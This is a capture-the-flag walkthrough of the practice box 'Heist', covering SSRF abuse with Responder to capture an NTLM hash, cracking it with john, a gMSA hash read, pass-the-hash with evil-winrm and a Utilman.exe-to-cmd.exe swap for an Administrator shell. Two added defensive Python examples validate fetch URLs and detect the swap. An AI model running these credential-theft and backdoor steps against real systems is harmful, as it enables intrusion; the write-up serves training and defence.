Proving Grounds — Practice — Heist
2026-3-30 07:7:59 Author: infosecwriteups.com (view original) Reads: 5

Makoyi

AI image created by https://deepai.org/machine-learning-model/hologram-3d-generator

Proving Grounds Practice box Heist is rated hard by Offsec, but the community disagrees and rated it very hard. I originally saw this box on TJ Null’s OSCP prep list for Active Directory practice, and I would have to agree that it is great practice. The box starts out with an SSRF vulnerability in the web application, then leverages a gMSA to escalate privileges, and finishes with SeRestorePrivilege to escalate to Administrator. With that being said, let’s crack into the box.


— NMAP Scan

makoyi@kali 27/03/26 11:02 [~] 
❯ sudo nmap -Pn -n 192.168.148.165 -sC -sV -p- --open
[sudo] password for makoyi:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 11:02 -0500
Nmap scan report for 192.168.148.165
Host is up (0.14s latency).
Not shown: 65513 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-27 16:09:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HEIST
| NetBIOS_Domain_Name: HEIST
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: heist.offsec
| DNS_Computer_Name: DC01.heist.offsec
| DNS_Tree_Name: heist.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2026-03-27T16:10:01+00:00
|_ssl-date: 2026-03-27T16:10:40+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2026-03-26T16:00:07
|_Not valid after: 2026-09-25T16:00:07
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49765/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2026-03-27T16:10:03
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 504.87 seconds

The web server on port 8080 was the first thing that stood out to me; with nothing else in the scan standing out too much, I navigated to the web page.

Now that looks interesting. I started a Python HTTP server and entered my IP address into the input field to see what would happen.

OK, that’s a good sign that the web application can be abused. After a lot of trial and error trying to get a reverse shell from various payloads and failing, I decided to pivot and set up Responder to see whether any other information was being sent.

makoyi@kali 27/03/26 11:29 [~] 
❯ sudo responder -I tun0

All right! Pivoting paid off and gave us a NetNTLMv2 hash that we can crack with John the Ripper.
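From the application's side, the SSRF used here is a missing check on where a user-supplied URL is allowed to point. The validator below is an added example written for this post; it is not code from the original write-up or from the box's Werkzeug application, whose source we never see. The injectable resolver, the constructed DNS table and the allowed port set are assumptions made so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Assumption: the "browser" feature only ever needs ordinary web ports.
ALLOWED_PORTS = {80, 443, 8080, 8443}


def default_resolver(host):
    """Return every IP the host resolves to (both A and AAAA records)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_public_address(addr):
    """True only for globally routable unicast addresses.

    Rejects loopback, RFC 1918, link-local (which covers the cloud metadata
    range 169.254.0.0/16), multicast and reserved space. IPv4-mapped IPv6
    addresses such as ::ffff:127.0.0.1 are unwrapped first so they cannot be
    used to sneak a loopback target past an IPv4-only check.
    """
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # unparsable (e.g. scoped link-local): treat as unsafe
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def check_target(url, resolver=default_resolver):
    """Decide whether a user-supplied URL may be fetched server-side.

    Returns (allowed, reason). `resolver` is injectable so the check can be
    exercised without network access.
    """
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed (file://, UNC paths, etc. are refused)"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"

    # IP literals are checked directly; names are resolved and *every*
    # returned address must be public, so a name that mixes a public and a
    # private answer is refused as well.
    try:
        addresses = {host} if _is_ip_literal(host) else resolver(host)
    except OSError:
        return False, "host does not resolve"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


# Constructed DNS records so the example runs offline (not real data).
CONSTRUCTED_DNS = {
    "example.com": {"93.184.216.34"},
    "localhost": {"127.0.0.1"},
    "intranet.corp": {"10.0.0.5"},
    "flaky.corp": {"93.184.216.34", "10.0.0.5"},  # public + private mix
}


def constructed_resolver(host):
    """Stand-in for default_resolver that answers from CONSTRUCTED_DNS."""
    try:
        return CONSTRUCTED_DNS[host.lower()]
    except KeyError:
        raise socket.gaierror(f"constructed resolver: unknown host {host}")


if __name__ == "__main__":
    for candidate in ("http://example.com/", "http://intranet.corp/",
                      "http://[::ffff:127.0.0.1]/", r"\\192.168.1.5\share",
                      "http://169.254.169.254/latest/"):
        print(candidate, "->", check_target(candidate, constructed_resolver))
```

Two caveats a practitioner would want alongside this check. First, the validator resolves the name itself, so the fetch client must connect to the address that was validated (pin it) or a DNS answer can change between check and use. Second, none of this stops the credential leak the write-up gets with Responder: that comes from the fetch client authenticating automatically to whatever host it is pointed at and from NTLM being allowed out of the server. Disable automatic NTLM authentication in the fetch client and block outbound SMB and NTLM at the perimeter in addition to the URL check.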

makoyi@kali 27/03/26 11:34 [~] 
❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
california (enox)
1g 0:00:00:00 DONE (2026-03-27 11:34) 100.0g/s 204800p/s 204800c/s 204800C/s 123456..lovers1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Now that we have a username and a password, let’s see what we can do with them. I started by enumerating SMB to see whether the password would work, and success!

There wasn’t anything too interesting at first glance in the SMB shares, so I decided to see whether the credentials could be used for any other services. I started with WinRM, with some wishful thinking, and look at that, it works.

Now that we’re logged in and have grabbed our local.txt file, it’s time to see whether we can escalate to a higher-privileged account. After a while of searching for a path, checking whoami /priv, checking SPNs, and attempting to use PowerUp.ps1, the most I could find was that there is another account named svc_apache$. At that point I figured I should go ahead and use BloodHound to see whether it could help me find a path.

makoyi@kali 27/03/26 11:52 [~] 
❯ bloodhound-python -d heist.offsec -u 'enox' -p 'california' -dc '192.168.148.165' -c all

The first thing I like to do after marking the account as owned is to check what outbound object control the account has.

It looks like enox is a member of the Web Admins group, which has ReadGMSAPassword over the svc_apache$ account. I went with BloodHound’s suggested Windows method: I downloaded a precompiled GMSAPasswordReader and used it to grab the RC4 hash (equivalent to the NT hash) of svc_apache$.

Now we pass the hash with evil-winrm and check our privileges to see what we can do.

SeRestorePrivilege is an interesting find, but I’m going to keep looking around to see if there’s anything else of note.

Well, it didn’t take long to find something interesting: it was inside the directory we landed in. Running cat on the file gives a helpful hint on how to escalate our privileges using SeRestorePrivilege, and the GitHub address listed gives step-by-step instructions on how to abuse it.

Using evil-winrm, we follow along with the steps.

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> cd C:\Windows\System32
*Evil-WinRM* PS C:\Windows\System32> ren Utilman.exe Utilman.old
*Evil-WinRM* PS C:\Windows\System32> ren cmd.exe Utilman.exe

Now we connect with rdesktop:

rdesktop 192.168.148.165

Once the session has come up, we press Windows + U to open a command terminal as Administrator.
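The Utilman swap above leaves a fingerprint on disk that is easy to check for: an accessibility helper in System32 whose bytes are identical to cmd.exe, plus the parked original under a new extension. The audit script below is an added example for this post, not the box's or the write-up's code. The helper list, the "non-.exe extension" heuristic and the constructed sample directory are assumptions; on a real host you would point audit_system32 at C:\Windows\System32 with a baseline of hashes captured from a known-good image of the same build.

```python
import hashlib
import os
import tempfile

# Binaries Windows launches with SYSTEM rights from the logon screen; any of
# them swapped for a shell yields a console without logging in (T1546.008).
ACCESSIBILITY_BINARIES = (
    "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
)
SHELLS = ("cmd.exe", "powershell.exe")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_system32(system32_dir, baseline=None):
    """Return sorted findings about the accessibility helpers in a directory.

    baseline maps lower-case file name -> expected sha256 from a known-good
    image; when given, any deviation is reported. Independently of a
    baseline, a helper whose hash equals one of the shells in the same
    directory is reported, which is exactly the state `ren cmd.exe
    Utilman.exe` leaves behind.
    """
    # Windows file names are case-insensitive; map lower-case -> actual name.
    entries = {name.lower(): name for name in os.listdir(system32_dir)}
    findings = []

    shell_hashes = {}
    for shell in SHELLS:
        if shell in entries:
            shell_hashes[sha256_of(os.path.join(system32_dir, entries[shell]))] = shell

    for helper in ACCESSIBILITY_BINARIES:
        if helper not in entries:
            findings.append(("missing", helper))
            continue
        digest = sha256_of(os.path.join(system32_dir, entries[helper]))
        if digest in shell_hashes:
            findings.append(("replaced_with_shell", helper, shell_hashes[digest]))
        elif baseline and baseline.get(helper) not in (None, digest):
            findings.append(("hash_mismatch", helper))

    # The original is usually parked next to the fake under a new extension.
    helper_stems = {h.rsplit(".", 1)[0] for h in ACCESSIBILITY_BINARIES}
    for lower, actual in entries.items():
        stem, _, ext = lower.rpartition(".")
        if stem in helper_stems and ext != "exe":
            findings.append(("renamed_original", actual))
    return sorted(findings)


def build_constructed_system32(directory):
    """Populate `directory` with a made-up System32 after the Utilman swap.

    The file contents are constructed stand-ins, not real binaries. Returns
    a baseline covering the one helper that was left untouched.
    """
    files = {
        "cmd.exe": b"CONSTRUCTED-SHELL",
        "Utilman.exe": b"CONSTRUCTED-SHELL",       # same bytes as cmd.exe
        "Utilman.old": b"CONSTRUCTED-UTILMAN",     # parked original
        "sethc.exe": b"CONSTRUCTED-STICKYKEYS",
    }
    for name, content in files.items():
        with open(os.path.join(directory, name), "wb") as f:
            f.write(content)
    return {"sethc.exe": hashlib.sha256(b"CONSTRUCTED-STICKYKEYS").hexdigest()}


def demo():
    """Build the constructed directory, audit it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_system32(tmp, build_constructed_system32(tmp))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Pair the on-disk check with least privilege: SeRestorePrivilege on a service account such as svc_apache$ is what made the rename in System32 possible in the first place, and it is rarely something a web service account needs. Where the privilege is legitimately held (backup software, for example), a baseline-driven run of this audit on a schedule catches the swap even when the rename itself was not logged.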

Thank you for reading!

I hope this walk-through helps, stay ethical, and happy hacking.


Source: https://infosecwriteups.com/proving-grounds-practice-heist-ed0bef92cc02?source=rss----7b722bfd1b8d---4